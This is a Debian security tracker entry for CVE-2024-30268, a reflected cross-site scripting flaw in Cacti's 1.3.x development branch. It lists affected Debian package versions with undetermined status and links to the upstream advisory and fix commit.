CVE-2024-30268

NameCVE-2024-30268
DescriptionCacti provides an operational monitoring and fault management framework. A reflected cross-site scripting vulnerability on the 1.3.x DEV branch allows attackers to obtain cookies of administrator and other users and fake their login using obtained cookies. This issue is fixed in commit a38b9046e9772612fda847b46308f9391a49891e.
SourceCVE (at NVD; CERT, LWN, oss-sec, fulldisc, Red Hat, Ubuntu, Gentoo, SUSE bugzilla/CVE, GitHub advisories/code/issues, web search, more)

Vulnerable and fixed packages

The table below lists information on source packages.

Source PackageReleaseVersionStatus
cacti (PTS)buster1.2.2+ds1-2+deb10u4undetermined
buster (security)1.2.2+ds1-2+deb10u6undetermined
bullseye1.2.16+ds1-2+deb11u2undetermined
bullseye (security)1.2.16+ds1-2+deb11u3undetermined
bookworm1.2.24+ds1-1+deb12u1undetermined
bookworm (security)1.2.24+ds1-1+deb12u2undetermined
trixie1.2.26+ds1-1undetermined
sid1.2.27+ds1-2undetermined

The information below is based on the following data on fixed versions.

PackageTypeReleaseFixed VersionUrgencyOriginDebian Bugs
cactisource(unstable)undetermined

Notes

https://github.com/Cacti/cacti/security/advisories/GHSA-9m3v-whmr-pc2q
https://github.com/Cacti/cacti/commit/a38b9046e9772612fda847b46308f9391a49891e
check, might be only affecting 1.3.y

Search for package or bug name: Reporting problems